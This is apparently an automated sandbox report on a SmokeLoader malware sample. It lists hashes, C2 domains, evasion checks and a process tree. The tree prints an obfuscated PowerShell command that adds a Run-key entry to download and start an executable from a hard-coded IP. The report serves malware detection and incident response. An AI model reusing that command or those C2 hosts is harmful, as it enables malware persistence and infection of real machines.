Analysis
-
max time kernel
154s -
max time network
159s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-08-2021 07:58
Static task
static1
Behavioral task
behavioral1
Sample
c75de20160110a422ccf173ce11e0aca.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
c75de20160110a422ccf173ce11e0aca.exe
Resource
win10v20210410
General
-
Target
c75de20160110a422ccf173ce11e0aca.exe
-
Size
180KB
-
MD5
c75de20160110a422ccf173ce11e0aca
-
SHA1
030a2a6dd9899032b22bb881b34f2e8190812675
-
SHA256
352d461ee47bb9c6618eb86b1e8b10721c0b0dfd4a4b3e85dfb939f6d101e942
-
SHA512
54a1cc95b2566333caba0abb961b4ab7c5575bb8e0da63d2e114ab0c6c241884f97ce665be6418cdb85a92acf2fabc9fd64b027c11e36a3e30c6b699e1ce72f7
Malware Config
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
388E.exe3C46.exeRuntimebroker.exe3FC0.exe43C7.exe4ABA.exepid process 728 388E.exe 804 3C46.exe 1300 Runtimebroker.exe 968 3FC0.exe 1012 43C7.exe 800 4ABA.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
4ABA.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4ABA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4ABA.exe -
Deletes itself 1 IoCs
Processes:
pid process 1288 -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
3C46.exepid process 804 3C46.exe 804 3C46.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\4ABA.exe themida behavioral1/memory/800-94-0x0000000000BF0000-0x0000000000BF1000-memory.dmp themida -
Processes:
4ABA.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4ABA.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
4ABA.exepid process 800 4ABA.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
c75de20160110a422ccf173ce11e0aca.exedescription pid process target process PID 1084 set thread context of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
c75de20160110a422ccf173ce11e0aca.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c75de20160110a422ccf173ce11e0aca.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c75de20160110a422ccf173ce11e0aca.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c75de20160110a422ccf173ce11e0aca.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
c75de20160110a422ccf173ce11e0aca.exepid process 1228 c75de20160110a422ccf173ce11e0aca.exe 1228 c75de20160110a422ccf173ce11e0aca.exe 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 1288 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1288 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
c75de20160110a422ccf173ce11e0aca.exepid process 1228 c75de20160110a422ccf173ce11e0aca.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
4ABA.exepowershell.exedescription pid process Token: SeShutdownPrivilege 1288 Token: SeShutdownPrivilege 1288 Token: SeDebugPrivilege 800 4ABA.exe Token: SeDebugPrivilege 972 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 1288 1288 1288 1288 -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid process 1288 1288 1288 1288 1288 1288 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
388E.exepid process 728 388E.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
c75de20160110a422ccf173ce11e0aca.exe3C46.exeRuntimebroker.exe3FC0.exedescription pid process target process PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1084 wrote to memory of 1228 1084 c75de20160110a422ccf173ce11e0aca.exe c75de20160110a422ccf173ce11e0aca.exe PID 1288 wrote to memory of 728 1288 388E.exe PID 1288 wrote to memory of 728 1288 388E.exe PID 1288 wrote to memory of 728 1288 388E.exe PID 1288 wrote to memory of 728 1288 388E.exe PID 1288 wrote to memory of 804 1288 3C46.exe PID 1288 wrote to memory of 804 1288 3C46.exe PID 1288 wrote to memory of 804 1288 3C46.exe PID 1288 wrote to memory of 804 1288 3C46.exe PID 804 wrote to memory of 1300 804 3C46.exe Runtimebroker.exe PID 804 wrote to memory of 1300 804 3C46.exe Runtimebroker.exe PID 804 wrote to memory of 1300 804 3C46.exe Runtimebroker.exe PID 804 wrote to memory of 1300 804 3C46.exe Runtimebroker.exe PID 1288 wrote to memory of 968 1288 3FC0.exe PID 1288 wrote to memory of 968 1288 3FC0.exe PID 1288 wrote to memory of 968 1288 3FC0.exe PID 1288 wrote to memory of 968 1288 3FC0.exe PID 1288 wrote to memory of 1012 1288 43C7.exe PID 1288 wrote to memory of 1012 1288 43C7.exe PID 1288 wrote to memory of 1012 1288 43C7.exe PID 1288 wrote to memory of 1012 1288 43C7.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1288 wrote to memory of 800 1288 4ABA.exe PID 1300 wrote to memory of 972 1300 Runtimebroker.exe powershell.exe PID 1300 wrote to memory of 972 1300 Runtimebroker.exe powershell.exe PID 1300 wrote to memory of 972 1300 Runtimebroker.exe powershell.exe PID 1300 wrote to memory of 972 1300 Runtimebroker.exe powershell.exe PID 968 wrote to memory of 1564 968 3FC0.exe cmd.exe PID 968 wrote to memory of 1564 968 3FC0.exe cmd.exe PID 968 wrote to memory of 1564 968 3FC0.exe cmd.exe PID 968 wrote to memory of 1564 968 3FC0.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe"C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe"C:\Users\Admin\AppData\Local\Temp\c75de20160110a422ccf173ce11e0aca.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\388E.exeC:\Users\Admin\AppData\Local\Temp\388E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\3C46.exeC:\Users\Admin\AppData\Local\Temp\3C46.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3FC0.exeC:\Users\Admin\AppData\Local\Temp\3FC0.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\43C7.exeC:\Users\Admin\AppData\Local\Temp\43C7.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4ABA.exeC:\Users\Admin\AppData\Local\Temp\4ABA.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\Users\Admin\AppData\Local\Temp\388E.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\3C46.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\Users\Admin\AppData\Local\Temp\3C46.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\Users\Admin\AppData\Local\Temp\3FC0.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\3FC0.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\43C7.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\43C7.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\4ABA.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\s.batMD5
8fec98c95605e4fe5120eec3b2287dd2
SHA141b14cf07ccbbbab34bc966fb6cb9afdb5bbadd7
SHA256700c2415c522ecceb578abff3f86c8ab40de7fdfc7295e6b120f55ce9f44d115
SHA51225063af35517a858652eac120a9649fb8d6c2b9e8613dc0ed29ea160c7f8b23572fd5b46c076b508a5df0b80e47eb7cb5580479c6ddb75d5e80e8a4ed3f1cb08
-
\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
memory/728-65-0x0000000000000000-mapping.dmp
-
memory/800-94-0x0000000000BF0000-0x0000000000BF1000-memory.dmpFilesize
4KB
-
memory/800-88-0x0000000000000000-mapping.dmp
-
memory/800-97-0x0000000002800000-0x0000000002801000-memory.dmpFilesize
4KB
-
memory/804-80-0x00000000002D0000-0x000000000030B000-memory.dmpFilesize
236KB
-
memory/804-81-0x0000000000400000-0x0000000002C7C000-memory.dmpFilesize
40.5MB
-
memory/804-69-0x0000000000000000-mapping.dmp
-
memory/968-98-0x0000000004E20000-0x0000000005031000-memory.dmpFilesize
2.1MB
-
memory/968-93-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/968-92-0x0000000003290000-0x00000000034D3000-memory.dmpFilesize
2.3MB
-
memory/968-108-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/968-77-0x0000000000000000-mapping.dmp
-
memory/972-111-0x00000000022D0000-0x00000000022D1000-memory.dmpFilesize
4KB
-
memory/972-112-0x00000000025D0000-0x00000000025D1000-memory.dmpFilesize
4KB
-
memory/972-110-0x0000000004902000-0x0000000004903000-memory.dmpFilesize
4KB
-
memory/972-100-0x0000000000000000-mapping.dmp
-
memory/972-109-0x0000000004900000-0x0000000004901000-memory.dmpFilesize
4KB
-
memory/972-104-0x0000000000940000-0x0000000000941000-memory.dmpFilesize
4KB
-
memory/972-105-0x0000000004940000-0x0000000004941000-memory.dmpFilesize
4KB
-
memory/1012-96-0x0000000004870000-0x0000000004871000-memory.dmpFilesize
4KB
-
memory/1012-82-0x0000000000000000-mapping.dmp
-
memory/1012-85-0x0000000000950000-0x0000000000951000-memory.dmpFilesize
4KB
-
memory/1084-63-0x00000000001B0000-0x00000000001BA000-memory.dmpFilesize
40KB
-
memory/1228-62-0x00000000752F1000-0x00000000752F3000-memory.dmpFilesize
8KB
-
memory/1228-61-0x0000000000402E1A-mapping.dmp
-
memory/1228-60-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1288-64-0x0000000003D40000-0x0000000003D56000-memory.dmpFilesize
88KB
-
memory/1300-75-0x0000000000000000-mapping.dmp
-
memory/1300-87-0x0000000000400000-0x0000000002C7C000-memory.dmpFilesize
40.5MB
-
memory/1564-103-0x0000000000000000-mapping.dmp